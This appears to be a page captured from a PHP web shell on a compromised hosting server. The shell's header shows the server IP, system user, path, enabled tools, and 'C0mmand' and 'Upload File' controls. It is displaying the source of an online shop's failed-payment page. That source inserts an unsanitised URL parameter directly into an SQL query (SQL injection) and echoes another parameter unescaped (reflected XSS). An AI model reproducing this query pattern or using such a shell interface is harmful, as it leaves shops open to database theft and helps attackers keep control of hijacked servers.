Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/imyrqtmy/public_html/agriba/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php require 'includes/db-conn.inc.php'; ?> <!DOCTYPE html> <html lang="en"> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <!-- /Added by HTTrack --> <head> <?php include 'includes/head.php';?> <title>Lakshya Resin Art Hub- Thank You</title> <link rel="stylesheet" href="css/about.css"> </head> <body> <div class="backdrop"></div> <a class="backtop fas fa-arrow-up" href="#"></a> <?php include 'includes/top-header.php'; include 'includes/header.php'; include 'includes/website-menu.php'; include 'includes/side-category.php'; // include 'includes/cart-sidebar.php'; // include 'includes/side-menu.php'; include 'includes/mobile-footer.php'; ?> <section class="inner-section single-banner" style="background: url(images/subscribe.webp) no-repeat center;"> <div class="container"> <h2>Thank You </h2> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.php">Home /</a></li> <li class="breadcrumb-item active" aria-current="page">Thank You</li> </ol> </div> </section> <section class="inner-section about-company"> <div class="container"> <?php $orderID = $_GET['oid']; $reason = $_GET['reason']; $paymentid = $_GET['paymentid']; $sql2=mysqli_query($conn,"select * from order_master where detailsorder_id='$orderID'") or die(mysqli_error($conn)); $row2=mysqli_fetch_array($sql2); extract($row2); ?> <center><div class="about-content"> <img src="images/372107370_CROSS_MARK_400px.gif" alt="about" style=" width: 120px;"> <h2>Transaction has been Failed.</h2> <p></p> <table class="table" style=" width: 45%;background-color: whitesmoke;border: 1px solid darkgoldenrod;"> <tr> <th>Order ID :</th> <td><?php echo $orderId; ?></td> </tr> <tr> <th>Payment ID :</th> <td><?php echo $paymentid; ?></td> </tr> </table> <a href="payment.php?&orderid=<?php echo $row2['orderId'];?>" class="btn btn-primary" style="color: var(--white);background: var(--primary);"> Try Again </a> </div></center> </div> </section> <?php include 'includes/footer.php'; ?> <script src="vendor/bootstrap/jquery-1.12.4.min.js"></script> <script src="vendor/bootstrap/popper.min.js"></script> <script src="vendor/bootstrap/bootstrap.min.js"></script> <script src="vendor/countdown/countdown.min.js"></script><script src="vendor/niceselect/nice-select.min.js"></script><script src="vendor/slickslider/slick.min.js"></script><script src="vendor/venobox/venobox.min.js"></script><script src="js/nice-select.js"></script><script src="js/countdown.js"></script><script src="js/accordion.js"></script><script src="js/venobox.js"></script><script src="js/slick.js"></script><script src="js/main.js"></script> </body> </html>